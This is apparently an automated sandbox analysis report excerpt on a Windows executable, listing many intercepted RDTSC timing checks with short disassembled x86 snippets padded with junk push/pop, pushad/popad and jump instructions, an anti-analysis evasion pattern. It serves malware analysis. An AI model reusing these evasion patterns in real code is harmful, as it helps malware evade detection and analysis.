                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132740C second address: 1327418 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327418 second address: 132741C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132741C second address: 1327422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132756B second address: 1327575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327575 second address: 13275BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jne 00007F5CB8E48996h 0x0000000c pop edi 0x0000000d je 00007F5CB8E4899Ch 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F5CB8E4899Dh 0x0000001b jg 00007F5CB8E48996h 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5CB8E4899Dh 0x0000002a jbe 00007F5CB8E48998h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13275BD second address: 13275E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DDA4h 0x00000008 jmp 00007F5CB8E4DD9Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5CB8E4DDA0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13275E5 second address: 13275E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327A03 second address: 1327A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5CB8E4DD96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327A0D second address: 1327A1C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E48996h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282A0 second address: 13282BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F5CB8E4DDA6h 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282BE second address: 13282D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282D0 second address: 13282D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282D6 second address: 13282DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328845 second address: 1328849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328849 second address: 132884D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132884D second address: 1328853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328B07 second address: 1328B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328DAB second address: 1328DEF instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c jng 00007F5CB8E4DD9Eh 0x00000012 jnc 00007F5CB8E4DDA2h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5CB8E4DDA0h 0x0000001f jng 00007F5CB8E4DD96h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331DF6 second address: 1331DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331681 second address: 1331689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EBC second address: 1339EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EC2 second address: 1339EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EC6 second address: 1339EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F5CB8E489A2h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13382DD second address: 13382E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338575 second address: 1338579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386D0 second address: 13386D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386D4 second address: 13386E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386E0 second address: 13386E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386E6 second address: 13386F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5CB8E48996h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386F0 second address: 1338714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5CB8E4DDA2h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338888 second address: 13388BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5CB8E489A7h 0x0000000d jmp 00007F5CB8E489A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388BD second address: 13388C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388C1 second address: 13388D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388D4 second address: 13388E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jbe 00007F5CB8E4DD96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388E6 second address: 13388EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134131A second address: 134133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F5CB8E4DDA8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134133C second address: 1341340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1353048 second address: 135304E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135304E second address: 1353080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5CB8E48998h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007F5CB8E48996h 0x00000014 jmp 00007F5CB8E489A7h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1352A9C second address: 1352AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360ACA second address: 1360B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E489A9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F5CB8E489A7h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B05 second address: 1360B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B0A second address: 1360B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F5CB8E4899Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B2B second address: 1360B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B31 second address: 1360B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B37 second address: 1360B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B3E second address: 1360B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365550 second address: 136555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136555A second address: 136555E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136555E second address: 136556E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B945 second address: 136B978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5CB8E489A1h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC63 second address: 136BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC67 second address: 136BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC6B second address: 136BC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5CB8E4DDA1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC82 second address: 136BC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC88 second address: 136BC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CA8B second address: 136CA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CA8F second address: 136CAC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA6h 0x00000007 jmp 00007F5CB8E4DDA7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1370320 second address: 1370338 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E48996h 0x00000008 jnp 00007F5CB8E48996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F5CB8E4899Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D579 second address: 137D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D57D second address: 137D59B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F5CB8E489A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A1F5 second address: 138A1F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A1F9 second address: 138A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A203 second address: 138A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CEBD second address: 138CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CEC6 second address: 138CED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5CB8E4DD96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CED0 second address: 138CED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D851 second address: 139D85B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C68D second address: 139C694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C694 second address: 139C69F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C97B second address: 139C97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C97F second address: 139C987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CAF3 second address: 139CB2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5CB8E489A9h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F5CB8E489B9h 0x00000011 pushad 0x00000012 jmp 00007F5CB8E489A3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCAD second address: 139CCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCB1 second address: 139CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F5CB8E48996h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCD3 second address: 139CCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D16A second address: 139D17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F5CB8E48996h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D45D second address: 139D461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D461 second address: 139D475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F5CB8E48996h 0x0000000e jbe 00007F5CB8E48996h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EF8A second address: 139EF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0783 second address: 13A07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F5CB8E489A4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5CB8E489A1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07B8 second address: 13A07BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07BE second address: 13A07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07C4 second address: 13A07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07CC second address: 13A07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3225 second address: 13A322A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A32A2 second address: 13A3308 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5CB8E48998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F5CB8E489A8h 0x00000011 nop 0x00000012 movsx edx, si 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F5CB8E48998h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 xor dx, 9D9Bh 0x00000036 push ABFFCCACh 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5CB8E4899Fh 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3308 second address: 13A330C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7EF8 second address: 13A7EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7EFE second address: 13A7F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7F06 second address: 13A7F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Fh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A7F1A second address: 13A7F21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02FD second address: 4ED0349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 pushfd 0x00000009 jmp 00007F5CB8E489A2h 0x0000000e xor esi, 58FE8F58h 0x00000014 jmp 00007F5CB8E4899Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F5CB8E489A6h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0349 second address: 4ED034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED034D second address: 4ED0353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0353 second address: 4ED0359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0359 second address: 4ED035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
